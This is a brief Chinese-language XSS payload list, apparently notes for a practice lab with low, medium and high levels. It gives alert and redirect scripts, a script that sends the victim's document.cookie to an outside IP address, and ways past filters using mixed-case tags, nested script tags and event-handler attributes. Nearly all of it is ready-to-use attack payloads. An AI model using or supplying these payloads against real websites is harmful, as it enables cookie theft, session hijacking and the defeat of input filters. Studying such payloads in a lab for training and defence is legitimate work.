低等级:
<script>alert('XSS')</script>
<a href='' οnclick=alert('xxx')>点击</a>
重定向
<script>window.location="http://www.baidu.com"</script>
获取cookie级:
<script>new Image().src="http:/192.168.208.133/c.php?output="+document.cookie;</script>
中等
可见过滤了<script>,可以选择大写,复写等
<Script>alert('XSS')</script>
<scri<script>pt>alert('FFFFF')</script>
高等级:
过滤了所有与<script>相关的数据,可以更换标签用以绕过
<body οnlοad=alert('XSSX')>